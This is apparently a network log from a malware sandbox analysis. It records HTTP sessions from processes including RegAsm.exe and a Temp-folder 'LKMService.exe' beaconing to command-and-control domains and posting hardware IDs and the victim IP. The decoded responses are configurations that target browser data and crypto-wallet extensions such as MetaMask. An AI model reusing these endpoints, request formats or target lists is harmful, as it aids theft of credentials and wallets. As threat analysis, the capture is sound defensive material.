2024-10-02 07:41:34 UTC	184	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:35 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49762	188.114.96.3	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:35 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: soldiefieop.site
2024-10-02 07:41:35 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:41:35 UTC	774	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=o0n7fmbcup4dg63psfr8bjr83u; expires=Sun, 26 Jan 2025 01:28:14 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lF4yevK%2FGHZetvv2l%2FA%2BnKjjnyPbQOi%2BBZCLWFBmRwhB33KRT2N52L%2FcA%2BK901SEEgZj6BXMVJGgrGKcv3kY1ulQszSDtePuxhprXqWJcUX4s1Fbijl8RFSUR%2BvabOa8BQdT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d079eff9e05-EWR
2024-10-02 07:41:35 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:41:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49763	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:36 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFCBFHJECAKEHIECGIEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 256 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:36 UTC	256	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 39 44 34 38 46 41 44 42 36 44 33 33 39 32 32 35 39 37 34 39 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 42 46 48 4a 45 43 41 4b 45 48 49 45 43 47 49 45 42 2d 2d 0d Data Ascii: ------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="hwid"1A9D48FADB6D3392259749-a33c7340-61ca------CFCBFHJECAKEHIECGIEBContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CFCBFHJECAKEHIECGIEB--
2024-10-02 07:41:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:36 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|f43bac6d65755dafea96f59570b8fecb\|1\|1\|1\|0\|0\|50000\|10

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49764	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:36 UTC	146	OUT	POST /get_update.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 19 Expect: 100-continue
2024-10-02 07:41:36 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:41:36 UTC	19	OUT	Data Raw: 63 75 72 72 65 6e 74 5f 76 65 72 73 69 6f 6e 3d 30 2e 33 Data Ascii: current_version=0.3
2024-10-02 07:41:36 UTC	615	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=e%2FGLJsLGvFheOXeUL74ZSPVpIwVLndy7erR8EfK3yUmN%2BG9b%2BMDn4ZSxf%2F42peYdATY68se0Jb%2Fb6Dg%2FYydjhxhvyPVALKgaLRc3bSbRHy5yHcdx7BmhOKt4ni%2BlK6Ujqg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d0e1e998c1d-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49765	104.21.56.150	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:36 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: abnomalrkmu.site
2024-10-02 07:41:36 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:41:36 UTC	774	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=dl2oht2aa821us1s8ns94hsv82; expires=Sun, 26 Jan 2025 01:28:15 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PaWD%2BSpW4fMhGbOaRXRMo9nMwGQf8vHR2si%2FoM35%2F68TFEptGpefd0686%2BDKZNFIziJFtlz59rGdiTA94VemZcZ3a%2BfdQxwTe588rIsbknmrGy%2BFrPgm2gX9LK0I%2BIAQg5FF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d0e6d974283-EWR
2024-10-02 07:41:36 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:41:36 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49767	104.21.84.18	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:37 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: treatynreit.site
2024-10-02 07:41:37 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:41:37 UTC	766	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t8dveceuit46452rauc9u5tel5; expires=Sun, 26 Jan 2025 01:28:16 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qj6efwoEsQMs6Se9Q3DO9fWvJy0MzODzhSwuWmQ7PsLAgxOgcxFe7%2Fi9fILIQ9pGk5Te3JdUFPls1VbJY9sOGXUIzN4XRX7YeWOTb7hZ1OpIxBPXJ4FhNNDJF%2FypjzZOoD%2Fa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d14498a436d-EWR
2024-10-02 07:41:37 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:41:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49768	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:37 UTC	143	OUT	POST /receive.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:41:37 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:41:37 UTC	84	OUT	Data Raw: 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 26 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 Data Ascii: ip=8.46.123.33&hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1
2024-10-02 07:41:37 UTC	609	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5r9FGdLoIeEKXGJm571jyd36Lf5oXTPwm%2BsyT%2BP2RjOLvG7NWy%2FpSMW3mkVICRZAireSnY9Fpgv1f54eDEAApW%2FexaiaJtOQbI5qFoxGg9lycQJ9YgqTGHr6JSXRYo0G4A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d144bae4276-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49766	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:37 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CGIEGHJEGHJKFIEBFHJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:37 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 43 47 49 45 47 48 4a 45 47 48 4a 4b 46 49 45 42 46 48 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------CGIEGHJEGHJKFIEBFHJKContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------CGIEGHJEGHJKFIEBFHJKCont
2024-10-02 07:41:38 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:38 UTC	1564	IN	Data Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45 Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49769	104.21.18.193	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:38 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: snarlypagowo.site
2024-10-02 07:41:38 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:41:38 UTC	780	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=lmmqk2cqrj7gl3uf50imkjoaj8; expires=Sun, 26 Jan 2025 01:28:17 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ukU8NKIepiMUMJxT0MO11hWRRk%2F%2FTwBQGVHb2pgKJiKD159zqJ7W%2BU10K4yxl%2BEM822LluLRl5AAHQtudeEdgBKY8fylZNBCbd4xYEFz7RoriKS1Ho3%2F1kSWkhuvCr3i%2FF2LHA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d1a1a4d8c90-EWR
2024-10-02 07:41:38 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:41:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49770	104.21.54.163	443	7500	C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:38 UTC	144	OUT	POST /get_file.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: yalubluseks.eu Content-Length: 84 Expect: 100-continue
2024-10-02 07:41:38 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-02 07:41:38 UTC	84	OUT	Data Raw: 68 77 69 64 3d 30 34 63 32 32 61 65 35 62 35 64 66 38 38 35 32 35 33 32 62 63 62 35 63 35 34 66 35 38 38 32 34 36 32 35 33 38 66 63 65 63 61 65 36 34 66 64 32 34 39 31 31 33 35 37 33 62 38 37 30 31 30 63 31 26 69 70 3d 38 2e 34 36 2e 31 32 33 2e 33 33 Data Ascii: hwid=04c22ae5b5df8852532bcb5c54f5882462538fcecae64fd249113573b87010c1&ip=8.46.123.33
2024-10-02 07:41:38 UTC	613	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=35t7ngF%2F27%2B9%2F5VHVCFh7k9tZ4xyq7JEKyZe%2BRe3%2FYWDq2oIeKhpR0%2BBVg9ngtFXVwRV4pHH2AV7jxRUJzhXKpgABDjtYmxmzv9vxxWgltxqiLnSuquaFYGg6sReMA5v5A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d1ac89b423e-EWR 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49771	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:38 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----EBGIDGCAFCBKECAAKJJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:38 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 45 42 47 49 44 47 43 41 46 43 42 4b 45 43 41 41 4b 4a 4a 4b 0d 0a 43 6f 6e 74 Data Ascii: ------EBGIDGCAFCBKECAAKJJKContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------EBGIDGCAFCBKECAAKJJKContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------EBGIDGCAFCBKECAAKJJKCont
2024-10-02 07:41:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:39 UTC	5685	IN	Data Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62 Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49772	172.67.195.67	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:39 UTC	262	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: mysterisop.site
2024-10-02 07:41:39 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-02 07:41:39 UTC	766	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:41:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hqqa0qa8btpula5ebecgdhi6op; expires=Sun, 26 Jan 2025 01:28:18 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QMnTA28TV7xAiNXT1tfPP2Qi9557%2BGRdJT1ndN%2FenYrnZCsFAsUNNQkAbyBbYSOk8Oy0J0IvM31aX3V9Nb2zo8TSYieMWrkO7JhFjK4LAMESirszNEC8oUy4yffeSENONXY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cc30d201ad4c354-EWR
2024-10-02 07:41:39 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-02 07:41:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49773	49.12.197.9	443	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 07:41:40 UTC	276	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGDBGDBFIJKECBAKF User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 49.12.197.9 Content-Length: 332 Connection: Keep-Alive Cache-Control: no-cache
2024-10-02 07:41:40 UTC	332	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 66 34 33 62 61 63 36 64 36 35 37 35 35 64 61 66 65 61 39 36 66 35 39 35 37 30 62 38 66 65 63 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 38 62 34 64 34 37 35 38 36 38 37 34 62 30 38 39 34 37 32 30 33 66 30 33 65 34 64 62 33 39 36 32 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 44 42 47 44 42 46 49 4a 4b 45 43 42 41 4b 46 0d 0a 43 6f 6e 74 Data Ascii: ------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="token"f43bac6d65755dafea96f59570b8fecb------HIJEGDBGDBFIJKECBAKFContent-Disposition: form-data; name="build_id"8b4d47586874b08947203f03e4db3962------HIJEGDBGDBFIJKECBAKFCont
2024-10-02 07:41:40 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-10-02 07:41:40 UTC	119	IN	Data Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49774	104.21.17.174	443	280	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
